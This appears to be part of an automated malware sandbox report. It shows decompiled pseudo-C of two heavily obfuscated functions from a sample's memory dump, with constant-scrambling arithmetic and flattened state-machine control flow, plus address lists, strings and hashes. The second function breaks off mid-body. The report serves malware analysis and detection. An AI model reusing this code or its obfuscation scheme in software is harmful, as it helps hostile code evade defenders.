0x00000000
0x0023ffca
0x0023ffdf
0x0023ffe4
0x0023ffeb
0x0023fff3
0x00000000
0x0023fff3
0x0023fe5c
0x002400fd
0x00240110
0x00240116
0x00000000
0x002400fd
0x0023fe68
0x0023ff86
0x00000000
0x0023ff86
0x0023fe74
0x0023ff73
0x0023ff74
0x0023ff75
0x0023ff7c
0x00000000
0x0023ff7c
0x0023fe80
0x0023fef4
0x0023ff19
0x0023ff2c
0x0023ff31
0x0023ff36
0x0023ff59
0x00000000
0x0023ff59
0x0023ff38
0x0023ff3f
0x0023ff41
0x0023ff43
0x0023ff45
0x0023ff46
0x0023ff4e
0x0023ff52
0x00000000
0x0023ff52
0x0023fe88
0x00000000
0x00000000
0x0023fe8e
0x0023fecd
0x0023fed2
0x0023fed9
0x0023fee1
0x00000000
0x0023fee1

Strings

{n, xrefs: 0023FB6E
Q-., xrefs: 0023FF90
%, xrefs: 0023FBFA
Q-., xrefs: 0023FF52
l, xrefs: 0023FEF4
-;, xrefs: 0023FD27
SeK, xrefs: 0023FA3B
Zb, xrefs: 0023FA76
^), xrefs: 0023FE22
K, xrefs: 0023FABB
s|, xrefs: 0023FB19
[+, xrefs: 0023FD2F
>, xrefs: 0023FE12
Q,L, xrefs: 0023FBB9
PL, xrefs: 0023FDAE
), xrefs: 0023FA6E

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
API String ID: 0-11970308
Opcode ID: f27188217ef1fdab18799a1c6f54906de13672c63670f2b103080ae02bea536b
Instruction ID: a6e9b9997d9ff287688e68dd1a56c2e20396b586140668c3e912996a57acf700
Opcode Fuzzy Hash: f27188217ef1fdab18799a1c6f54906de13672c63670f2b103080ae02bea536b
Instruction Fuzzy Hash: 961245B25183808FD368CF25C989A4BBBF1BBC4314F108A1DF6D9862A0D7B59959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00231CFA, Relevance: 18.0, Strings: 14, Instructions: 503
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00231CFA(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				void* __ecx;
				void* _t496;
				void* _t539;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t548;
				signed int _t551;
				intOrPtr _t552;
				intOrPtr _t554;
				signed int _t555;
				intOrPtr _t562;
				intOrPtr _t572;
				void* _t574;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				intOrPtr _t591;
				intOrPtr _t592;
				void* _t597;
				intOrPtr _t599;
				intOrPtr _t635;
				intOrPtr _t639;
				void* _t641;
				signed int* _t653;
				void* _t656;

				_t575 = _a4;
				_push(_a4);
				_push(__edx);
				E0023602B(_t496);
				_v12 = 0x36bdff;
				_t653 =  &(( &_v228)[3]);
				_v8 = 0x3ff2a1;
				_t639 = 0;
				_v4 = 0;
				_v132 = 0xebdb;
				_t641 = 0x15e50797;
				_t577 = 0x54;
				_v132 = _v132 / _t577;
				_v132 = _v132 | 0x22f60655;
				_v132 = _v132 ^ 0x22f660d1;
				_v120 = 0xef02;
				_v120 = _v120 + 0xffff4354;
				_v120 = _v120 + 0xfbd6;
				_v120 = _v120 ^ 0x0001ae28;
				_v52 = 0x7417;
				_v52 = _v52 + 0x1179;
				_v52 = _v52 ^ 0x00000590;
				_v48 = 0x8f30;
				_v48 = _v48 >> 0xf;
				_v64 = 0xc7cd;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x0c7cd040;
				_v140 = 0xc967;
				_v140 = _v140 << 0xb;
				_v140 = _v140 | 0xe06bf9c9;
				_v140 = _v140 ^ 0x166bf9c9;
				_v196 = 0x461e;
				_v196 = _v196 | 0x6b692bd6;
				_v196 = _v196 + 0xc0cf;
				_v196 = _v196 + 0xffff0de4;
				_v196 = _v196 ^ 0x6b6977c5;
				_v180 = 0xfff7;
				_t578 = 0x59;
				_v180 = _v180 / _t578;
				_t579 = 0x4d;
				_v180 = _v180 * 0x18;
				_v180 = _v180 | 0x58a6a9da;
				_v180 = _v180 ^ 0x58a6c249;
				_v128 = 0x9f16;
				_v128 = _v128 ^ 0xdade8ffa;
				_v128 = _v128 ^ 0x4c90ffe3;
				_v128 = _v128 ^ 0x964ece00;
				_v92 = 0xcecd;
				_v92 = _v92 + 0x8237;
				_v92 = _v92 / _t579;
				_v92 = _v92 ^ 0x00006f99;
				_v100 = 0x1088;
				_v100 = _v100 << 8;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0084674e;
				_v108 = 0x5533;
				_v108 = _v108 >> 9;
				_v108 = _v108 | 0xd8fb4233;
				_v108 = _v108 ^ 0xd8fb1bcd;
				_v208 = 0xcae;
				_v208 = _v208 / _t579;
				_t580 = 0x13;
				_v208 = _v208 / _t580;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 ^ 0x00001a16;
				_v216 = 0x40e3;
				_v216 = _v216 | 0x810267c5;
				_v216 = _v216 << 1;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x10267eee;
				_v28 = 0xb673;
				_t581 = 0x3e;
				_v28 = _v28 / _t581;
				_v28 = _v28 ^ 0x0000683f;
				_v40 = 0x9279;
				_v40 = _v40 + 0xffffeab6;
				_v40 = _v40 ^ 0x000054a5;
				_v204 = 0x1c40;
				_v204 = _v204 + 0xffff1f7d;
				_t582 = 0x50;
				_v204 = _v204 / _t582;
				_v204 = _v204 ^ 0x72bb6b9a;
				_v204 = _v204 ^ 0x71887e03;
				_v112 = 0xb897;
				_v112 = _v112 + 0xffffdcba;
				_v112 = _v112 | 0x14aad9bd;
				_v112 = _v112 ^ 0x14aaad8a;
				_v172 = 0xd85f;
				_v172 = _v172 + 0xffff9181;
				_t583 = 0x36;
				_v172 = _v172 * 0x2e;
				_v172 = _v172 + 0x3c74;
				_v172 = _v172 ^ 0x00135ecd;
				_v212 = 0x19f7;
				_v212 = _v212 + 0xffff95e1;
				_v212 = _v212 | 0x04fc32b0;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0xfeffe01a;
				_v36 = 0x7d37;
				_v36 = _v36 | 0x20ef5b1a;
				_v36 = _v36 ^ 0x20ef0402;
				_v116 = 0xd595;
				_v116 = _v116 / _t583;
				_v116 = _v116 + 0xffffe49c;
				_v116 = _v116 ^ 0xffffa94a;
				_v160 = 0x5e14;
				_v160 = _v160 | 0xdf0c29a2;
				_v160 = _v160 ^ 0xe579e09e;
				_v160 = _v160 + 0xffffde5a;
				_v160 = _v160 ^ 0x3a753154;
				_v68 = 0x52ff;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x000014f4;
				_v76 = 0x7879;
				_t584 = 0x73;
				_v76 = _v76 / _t584;
				_v76 = _v76 ^ 0x0000054d;
				_v72 = 0x594e;
				_v72 = _v72 ^ 0x61e5003d;
				_v72 = _v72 ^ 0x61e57443;
				_v156 = 0xdc41;
				_v156 = _v156 << 6;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x10402e5f;
				_v152 = 0x2cab;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xa6d63634;
				_v152 = _v152 ^ 0xa41cdbd3;
				_v24 = 0xfca2;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x000010c7;
				_v96 = 0xe6c1;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0xc19f;
				_v96 = _v96 ^ 0x1cd8953a;
				_v224 = 0x49a1;
				_v224 = _v224 ^ 0xfe0521c0;
				_v224 = _v224 + 0x1e0d;
				_v224 = _v224 | 0x46707e16;
				_v224 = _v224 ^ 0xfe759897;
				_v228 = 0x2882;
				_v228 = _v228 << 0x10;
				_v228 = _v228 ^ 0x2e28bbbf;
				_v228 = _v228 | 0x3bec92e5;
				_v228 = _v228 ^ 0x3fee891d;
				_v136 = 0x5ad;
				_v136 = _v136 ^ 0x3d33a635;
				_v136 = _v136 + 0xffff9ac4;
				_v136 = _v136 ^ 0x3d335448;
				_v104 = 0x3c69;
				_v104 = _v104 + 0xf144;
				_t585 = 0x19;
				_v104 = _v104 * 0x1e;
				_v104 = _v104 ^ 0x0023546a;
				_v188 = 0xf300;
				_v188 = _v188 / _t585;
				_v188 = _v188 + 0xffffad26;
				_v188 = _v188 | 0x8105dcb8;
				_v188 = _v188 ^ 0xffffe238;
				_v144 = 0x45c8;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 + 0x45b6;
				_v144 = _v144 ^ 0x000072cd;
				_v192 = 0xd236;
				_v192 = _v192 >> 0x10;
				_t586 = 0x69;
				_v192 = _v192 / _t586;
				_v192 = _v192 ^ 0x176600d6;
				_v192 = _v192 ^ 0x17663ad7;
				_v200 = 0x1b90;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 | 0x00032953;
				_t587 = 0xe;
				_v200 = _v200 * 0x71;
				_v200 = _v200 ^ 0x016540c6;
				_v32 = 0xa5b;
				_v32 = _v32 / _t587;
				_v32 = _v32 ^ 0x00002bda;
				_v56 = 0xbe4e;
				_v56 = _v56 + 0xffffe059;
				_v56 = _v56 ^ 0x0000eaa3;
				_v220 = 0x4321;
				_v220 = _v220 ^ 0x3fa1daa1;
				_v220 = _v220 + 0xffff309f;
				_t588 = 0x24;
				_v220 = _v220 / _t588;
				_v220 = _v220 ^ 0x01c46047;
				_v164 = 0x3944;
				_v164 = _v164 + 0xffff1fd9;
				_t589 = 0x2b;
				_v164 = _v164 * 0x57;
				_v164 = _v164 << 4;
				_v164 = _v164 ^ 0xfc749d64;
				_v148 = 0x7755;
				_v148 = _v148 ^ 0x244775ea;
				_v148 = _v148 | 0xcd3e82a6;
				_v148 = _v148 ^ 0xed7f8152;
				_v88 = 0x40ad;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000030bd;
				_v80 = 0x9327;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x00406c8d;
				_v176 = 0x8ba8;
				_v176 = _v176 + 0x5748;
				_v176 = _v176 + 0xffffe08a;
				_v176 = _v176 + 0xffffcf91;
				_v176 = _v176 ^ 0x0000bf1e;
				_v124 = 0xe985;
				_v124 = _v124 ^ 0x9cf6d459;
				_v124 = _v124 + 0xffffb832;
				_v124 = _v124 ^ 0x9cf5d440;
				_v184 = 0xee13;
				_v184 = _v184 / _t589;
				_v184 = _v184 ^ 0x973ecc13;
				_t590 = 0x6a;
				_v184 = _v184 / _t590;
				_v184 = _v184 ^ 0x016d24ef;
				_v84 = 0xbcf1;
				_v84 = _v84 ^ 0x64b03ea8;
				_v84 = _v84 ^ 0x64b0e2a8;
				_v60 = 0x8a4f;
				_v60 = _v60 | 0x8c15d5a4;
				_v60 = _v60 ^ 0x8c14dfef;
				_v44 = 0x30ef;
				_v44 = _v44 + 0xffffe2a4;
				_v44 = _v44 ^ 0x00001380;
				_v168 = 0xbe5e;
				_v168 = _v168 << 0x10;
				_v168 = _v168 | 0x5aa68a8d;
				_v168 = _v168 + 0xffff34cf;
				_v168 = _v168 ^ 0xfefdbf5d;
				goto L1;
				do {
					while(1) {
						L1:
						_t656 = _t641 - 0x2e2ba50c;
						if(_t656 > 0) {
							break;
						}
						if(_t656 == 0) {
							_push(_t590);
							_push(_t590);
							_t591 =  *0x24ca20; // 0x0
							_t590 = _t591 + 0x18;
							_t551 = E0023C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
							_t653 =  &(_t653[7]);
							asm("sbb esi, esi");
							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
							continue;
						} else {
							if(_t641 == 0xfdb1f24) {
								_t552 =  *0x24ca20; // 0x0
								_t554 =  *0x24ca20; // 0x0
								_t555 = E0023F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
								_t590 = _v224;
								asm("sbb esi, esi");
								_t641 = ( ~_t555 & 0x1a4c73ed) + 0x1af0d9d8;
								E00249465(_t590, _v20, _v228);
								_t653 =  &(_t653[0xa]);
								goto L27;
							} else {
								if(_t641 == 0x15e50797) {
									_push(_t590);
									_t597 = 0x34;
									_t562 = E00238736(_t597);
									 *0x24ca20 = _t562;
									_t590 = _t590;
									if(_t562 != 0) {
										_t641 = 0x2e2ba50c;
										continue;
									}
								} else {
									if(_t641 == 0x1af0d9d8) {
										_t599 =  *0x24ca20; // 0x0
										_t590 =  *(_t599 + 0x18);
										E002387FA(_t590);
										_t653 = _t653 - 0x10 + 0x10;
										_t641 = 0x3b32afa9;
										continue;
									} else {
										if(_t641 == 0x1f84fef1) {
											_t572 =  *0x24ca20; // 0x0
											_push(_t590);
											_push(_t590);
											E0024AB25(_t590,  *((intOrPtr*)(_t572 + 0x24)));
											_t653 =  &(_t653[3]);
											_t641 = 0x1af0d9d8;
											continue;
										} else {
											if(_t641 != 0x2135b5bc) {
												goto L27;
											} else {
												_t635 =  *0x24ca20; // 0x0
												_t437 = _t635 + 0x2c; // 0x2c
												_t590 = _t437;
												_t574 = E00241A1F(_t590,  *((intOrPtr*)(_t635 + 0x18)), _v220, _v120, _v164, _v148, _t590, _v88, _t590, _v80);
												_t653 =  &(_t653[8]);
												if(_t574 != 0) {
													_t639 = 1;
												} else {
													_t641 = 0x3151f296;
													continue;
												}
											}
										}
									}
								}
							}
						}
						L21:
						return _t639;
					}
					if(_t641 == 0x315000fd) {
						_t590 = _v36;
						_t539 = E002375AE(_t590,  *_t575, _t590,  &_v20, _v44, _v116,  *((intOrPtr*)(_t575 + 4)),  &_v16, _v160, _v52, _v168 | _v60, _v68, _v76);
						_t653 =  &(_t653[0xb]);
						if(_t539 == 0) {
							_t641 = 0x1af0d9d8;
							goto L27;
						} else {
							_t641 = 0xfdb1f24;
							goto L1;
						}
					} else {
						if(_t641 == 0x3151f296) {
							_t544 =  *0x24ca20; // 0x0
							_push(_t590);
							_push(_t590);
							E0024AB25(_t590,  *((intOrPtr*)(_t544 + 0x10)));
							_t653 =  &(_t653[3]);
							_t641 = 0x1f84fef1;
							goto L1;
						} else {
							if(_t641 == 0x353d4dc5) {
								_t546 =  *0x24ca20; // 0x0
								_t592 =  *0x24ca20; // 0x0
								_t590 =  *(_t592 + 0x18);
								_t548 = E002366C9(_t590, _v48, _v132, _t546 + 0x10, _v192, _v200, _v32, _v56);
								_t653 =  &(_t653[6]);
								asm("sbb esi, esi");
								_t641 = ( ~_t548 & 0x01b0b6cb) + 0x1f84fef1;
								goto L1;
							} else {
								if(_t641 != 0x3b32afa9) {
									goto L27;
								} else {
									E0023F536(_v92, _v100, _v108,  *0x24ca20);
								}
							}
						}
					}
					goto L21;
					L27:
				} while (_t641 != 0x5edb69a);
				goto L21;
			}

0x00231d01
0x00231d0b
0x00231d0c
0x00231d0e
0x00231d13
0x00231d1e
0x00231d21
0x00231d2c
0x00231d2e
0x00231d37
0x00231d3f
0x00231d4a
0x00231d4f
0x00231d55
0x00231d5d
0x00231d65
0x00231d70
0x00231d7b
0x00231d86
0x00231d91
0x00231d9c
0x00231da7
0x00231db2
0x00231dbd
0x00231dd3
0x00231dde
0x00231de6
0x00231df1
0x00231df9
0x00231dfe
0x00231e06
0x00231e0e
0x00231e16
0x00231e1e
0x00231e26
0x00231e2e
0x00231e36
0x00231e42
0x00231e47
0x00231e52
0x00231e53
0x00231e57
0x00231e5f
0x00231e67
0x00231e6f
0x00231e77
0x00231e7f
0x00231e87
0x00231e92
0x00231ea6
0x00231ead
0x00231eb8
0x00231ec3
0x00231ecb
0x00231ed3
0x00231ede
0x00231ee9
0x00231ef1
0x00231efc
0x00231f07
0x00231f19
0x00231f23
0x00231f28
0x00231f2e
0x00231f33
0x00231f3b
0x00231f43
0x00231f4b
0x00231f4f
0x00231f54
0x00231f5c
0x00231f6e
0x00231f73
0x00231f7c
0x00231f87
0x00231f92
0x00231f9d
0x00231fa8
0x00231fb0
0x00231fbc
0x00231fc1
0x00231fc7
0x00231fcf
0x00231fd7
0x00231fe2
0x00231fed
0x00231ff8
0x00232003
0x0023200b
0x00232018
0x0023201b
0x0023201f
0x00232027
0x0023202f
0x00232037
0x0023203f
0x00232047
0x0023204c
0x00232054
0x0023205f
0x0023206a
0x00232075
0x0023208b
0x00232092
0x0023209d
0x002320a8
0x002320b0
0x002320b8
0x002320c0
0x002320c8
0x002320d0
0x002320db
0x002320e3
0x002320ee
0x00232100
0x00232103
0x0023210a
0x00232115
0x00232120
0x0023212d
0x00232138
0x00232140
0x00232145
0x0023214a
0x00232152
0x0023215a
0x0023215f
0x00232167
0x0023216f
0x0023217a
0x00232182
0x0023218d
0x00232198
0x002321a0
0x002321ab
0x002321b6
0x002321be
0x002321c6
0x002321ce
0x002321d6
0x002321de
0x002321e6
0x002321eb
0x002321f3
0x002321fb
0x00232203
0x0023220b
0x00232213
0x0023221b
0x00232223
0x0023222e
0x00232243
0x00232246
0x0023224d
0x00232258
0x00232268
0x0023226c
0x00232274
0x0023227c
0x00232284
0x0023228c
0x00232291
0x00232299
0x002322a1
0x002322a9
0x002322b2
0x002322b7
0x002322bd
0x002322c5
0x002322cd
0x002322d5
0x002322da
0x002322e7
0x002322e8
0x002322ec
0x002322f4
0x00232308
0x0023230f
0x0023231a
0x00232325
0x00232330
0x0023233b
0x00232343
0x0023234b
0x00232360
0x00232365
0x0023236b
0x00232373
0x0023237b
0x00232388
0x0023238b
0x0023238f
0x00232394
0x0023239c
0x002323a4
0x002323ac
0x002323b4
0x002323bc
0x002323c7
0x002323cf
0x002323da
0x002323ed
0x002323f4
0x002323ff
0x00232407
0x0023240f
0x00232417
0x0023241f
0x00232427
0x0023242f
0x00232437
0x0023243f
0x00232447
0x00232457
0x0023245b
0x00232467
0x0023246a
0x0023246e
0x00232476
0x00232481
0x0023248c
0x00232497
0x002324a2
0x002324ad
0x002324b8
0x002324c3
0x002324ce
0x002324d9
0x002324e1
0x002324e6
0x002324ee
0x002324f6
0x002324f6
0x002324fe
0x002324fe
0x002324fe
0x002324fe
0x00232504
0x00000000
0x00000000
0x0023250a
0x00232686
0x00232687
0x002326a7
0x002326b1
0x002326b4
0x002326b9
0x002326c0
0x002326c8
0x00000000
0x00232510
0x00232516
0x00232620
0x00232644
0x00232657
0x00232669
0x0023266f
0x00232677
0x00232679
0x0023267e
0x00000000
0x0023251c
0x00232522
0x002325f6
0x002325fa
0x002325fb
0x00232600
0x00232606
0x00232609
0x0023260f
0x00000000
0x0023260f
0x00232528
0x0023252a
0x002325cf
0x002325d5
0x002325d8
0x002325dd
0x002325e0
0x00000000
0x00232530
0x00232536
0x002325a0
0x002325a5
0x002325a6
0x002325aa
0x002325af
0x002325b2
0x00000000
0x00232538
0x0023253e
0x00000000
0x00232544
0x00232567
0x0023256d
0x0023256d
0x00232573
0x00232578
0x0023257d
0x0023282d
0x00232583
0x00232583
0x00000000
0x00232583
0x0023257d
0x0023253e
0x00232536
0x0023252a
0x00232522
0x00232516
0x00232721
0x0023272d
0x0023272d
0x002326d9
0x002327fb
0x00232802
0x00232807
0x0023280c
0x00232818
0x00000000
0x0023280e
0x0023280e
0x00000000
0x0023280e
0x002326df
0x002326e5
0x00232796
0x0023279b
0x0023279c
0x002327a0
0x002327a5
0x002327a8
0x00000000
0x002326eb
0x002326f1
0x00232744
0x0023275b
0x00232761
0x00232764
0x00232769
0x00232770
0x00232778
0x00000000
0x002326f3
0x002326f9
0x00000000
0x002326ff
0x0023271a
0x00232720
0x002326f9
0x002326f1
0x002326e5
0x00000000
0x0023281a
0x0023281a
0x00000000

Strings

[, xrefs: 002322F4
HT3=, xrefs: 0023221B
!C, xrefs: 0023233B
Cta, xrefs: 0023212D
?h, xrefs: 00231F7C
3U, xrefs: 00231EDE
@, xrefs: 00231F3B
HW, xrefs: 00232407
0, xrefs: 002324B8
i<, xrefs: 00232223
uG$, xrefs: 002323A4
T1u:, xrefs: 002320C8
t<, xrefs: 0023201F
D9, xrefs: 00232373

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: !C$3U$?h$Cta$D9$HT3=$HW$T1u:$[$i<$t<$0$@$uG$
API String ID: 0-1338720442
Opcode ID: 0d813abe9c26d290c133af1fbeb8e3a4a1a790cbb49830dc7160ca0a1be9e933
Instruction ID: f9f00108a93da0cdfd006c6a4615d5512db971c54960b805ef79dd27e04c9a10
Opcode Fuzzy Hash: 0d813abe9c26d290c133af1fbeb8e3a4a1a790cbb49830dc7160ca0a1be9e933
Instruction Fuzzy Hash: F1425671508381DFE3B8CF25C84AA9BBBE1BBC4304F10891DE5D9962A0D7B58859CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0024511B, Relevance: 17.9, Strings: 14, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E0024511B(intOrPtr* __ecx, intOrPtr __edx, intOrPtr* _a4) {
				char _v64;
				char _v128;
				signed int _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr* _v144;
				char _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				unsigned int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				unsigned int _v308;
				signed int _v312;
				signed int _v316;
				signed int _t462;
				intOrPtr* _t466;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr _t521;
				void* _t522;
				void* _t525;
				void* _t528;
				intOrPtr* _t531;
				signed int* _t532;

				_t466 = __ecx;
				_t532 =  &_v316;
				_v140 = __edx;
				_v144 = __ecx;
				_v132 = _v132 & 0x00000000;
				_v136 = 0x75b778;
				_v308 = 0x9968;
				_v308 = _v308 | 0x0cfdc455;
				_v308 = _v308 + 0xdd4c;
				_v308 = _v308 >> 3;
				_v308 = _v308 ^ 0x019fad6f;
				_v172 = 0xa03a;
				_v172 = _v172 >> 8;
				_v172 = _v172 ^ 0x00000391;
				_v228 = 0x2930;
				_v228 = _v228 << 0xc;
				_v228 = _v228 ^ 0x02930f5f;
				_v220 = 0x5883;
				_v220 = _v220 + 0xffff1c36;
				_v220 = _v220 ^ 0xffff6a37;
				_v288 = 0x122f;
				_v288 = _v288 << 0xf;
				_v288 = _v288 + 0xd44b;
				_v288 = _v288 << 0xa;
				_v288 = _v288 ^ 0x6151757c;
				_v260 = 0xc525;
				_v260 = _v260 << 0xa;
				_t522 = 0x1b8692db;
				_t513 = 0x61;
				_v260 = _v260 / _t513;
				_v260 = _v260 ^ 0x00083ddd;
				_v164 = 0x49a7;
				_t514 = 0x7b;
				_t462 = 0x17;
				_v164 = _v164 * 0x76;
				_v164 = _v164 ^ 0x002193f4;
				_v300 = 0x59a2;
				_v300 = _v300 ^ 0x3b27ac73;
				_v300 = _v300 + 0xffff6ec5;
				_v300 = _v300 + 0xffffb5fd;
				_v300 = _v300 ^ 0x3b271e50;
				_v252 = 0xb9af;
				_v252 = _v252 >> 8;
				_v252 = _v252 + 0xffffa108;
				_v252 = _v252 ^ 0xfffffedf;
				_v196 = 0x7b72;
				_v196 = _v196 << 2;
				_v196 = _v196 ^ 0x0001e8b2;
				_v272 = 0x250d;
				_v272 = _v272 * 0x16;
				_v272 = _v272 >> 3;
				_v272 = _v272 / _t514;
				_v272 = _v272 ^ 0x0000021c;
				_v156 = 0x4ea8;
				_v156 = _v156 + 0xffff8c10;
				_v156 = _v156 ^ 0xffffc687;
				_v292 = 0x9a7d;
				_v292 = _v292 << 1;
				_v292 = _v292 / _t462;
				_v292 = _v292 | 0x2e5edf0a;
				_v292 = _v292 ^ 0x2e5e89f7;
				_v236 = 0x69d3;
				_t515 = 0x5a;
				_v236 = _v236 / _t515;
				_v236 = _v236 >> 0xf;
				_v236 = _v236 ^ 0x000046bd;
				_v268 = 0x8cb9;
				_v268 = _v268 + 0xffff2c59;
				_v268 = _v268 << 4;
				_v268 = _v268 << 2;
				_v268 = _v268 ^ 0xffee6fc7;
				_v284 = 0x8a1;
				_v284 = _v284 ^ 0x358a3729;
				_v284 = _v284 << 4;
				_v284 = _v284 + 0xde3b;
				_v284 = _v284 ^ 0x58a4aa69;
				_v264 = 0x360c;
				_v264 = _v264 ^ 0xc2d2005c;
				_v264 = _v264 << 6;
				_t516 = 0x32;
				_v264 = _v264 * 0x5c;
				_v264 = _v264 ^ 0xe2e17670;
				_v180 = 0x8be;
				_v180 = _v180 | 0xafaf70c7;
				_v180 = _v180 ^ 0xafaf5d0a;
				_v168 = 0x59fe;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0x0b3f82ad;
				_v188 = 0x197e;
				_v188 = _v188 << 4;
				_v188 = _v188 ^ 0x0001c80c;
				_v256 = 0x542a;
				_v256 = _v256 + 0x92cc;
				_v256 = _v256 | 0xa238a407;
				_v256 = _v256 ^ 0xa2389846;
				_v224 = 0x7627;
				_v224 = _v224 + 0xdff4;
				_v224 = _v224 ^ 0x000122df;
				_v316 = 0x3ece;
				_v316 = _v316 * 0x74;
				_v316 = _v316 >> 8;
				_v316 = _v316 | 0xc6a89cdb;
				_v316 = _v316 ^ 0xc6a8f635;
				_v244 = 0x10d9;
				_v244 = _v244 | 0xf517e732;
				_v244 = _v244 + 0x5e6f;
				_v244 = _v244 ^ 0xf518070f;
				_v160 = 0xb68b;
				_v160 = _v160 >> 7;
				_v160 = _v160 ^ 0x00003a74;
				_v276 = 0x3579;
				_v276 = _v276 | 0x431a7672;
				_v276 = _v276 << 2;
				_v276 = _v276 / _t516;
				_v276 = _v276 ^ 0x003ff326;
				_v216 = 0xcfb7;
				_t517 = 0x63;
				_v216 = _v216 / _t517;
				_v216 = _v216 ^ 0x00003917;
				_v312 = 0xd3b7;
				_v312 = _v312 ^ 0x43b1e200;
				_v312 = _v312 << 8;
				_t518 = 0x70;
				_v312 = _v312 / _t518;
				_v312 = _v312 ^ 0x01952af0;
				_v248 = 0xe683;
				_v248 = _v248 | 0xeb182d0f;
				_v248 = _v248 + 0xcf0c;
				_v248 = _v248 ^ 0xeb19e4ec;
				_v204 = 0xada2;
				_v204 = _v204 >> 0x10;
				_v204 = _v204 ^ 0x000009df;
				_v152 = 0xb32a;
				_v152 = _v152 + 0xffff4f9d;
				_v152 = _v152 ^ 0x00004085;
				_v212 = 0xbe4c;
				_t531 = _a4;
				_v212 = _v212 * 5;
				_v212 = _v212 ^ 0x00039e07;
				_v280 = 0xc7f7;
				_v280 = _v280 | 0xad7c9e6f;
				_v280 = _v280 * 0x1c;
				_v280 = _v280 | 0xde3ec68b;
				_v280 = _v280 ^ 0xffbea491;
				_v240 = 0x8de7;
				_v240 = _v240 * 0x45;
				_t463 = _v140;
				_v240 = _v240 / _t462;
				_v240 = _v240 ^ 0x00019f2b;
				_v304 = 0x16f;
				_v304 = _v304 | 0xdf403998;
				_v304 = _v304 ^ 0x6a41af55;
				_v304 = _v304 | 0x5f7c1de9;
				_v304 = _v304 ^ 0xff7dd65d;
				_v208 = 0xa25a;
				_v208 = _v208 / _t518;
				_v208 = _v208 ^ 0x00007fd0;
				_v184 = 0x444f;
				_t519 = 0x26;
				_v184 = _v184 * 0x7d;
				_v184 = _v184 ^ 0x002171af;
				_v192 = 0x6191;
				_v192 = _v192 << 6;
				_v192 = _v192 ^ 0x00185c0b;
				_v200 = 0x9864;
				_v200 = _v200 / _t519;
				_v200 = _v200 ^ 0x0000693d;
				_v232 = 0xae1;
				_v232 = _v232 ^ 0x7986b26b;
				_t520 = 0x49;
				_t521 = _v140;
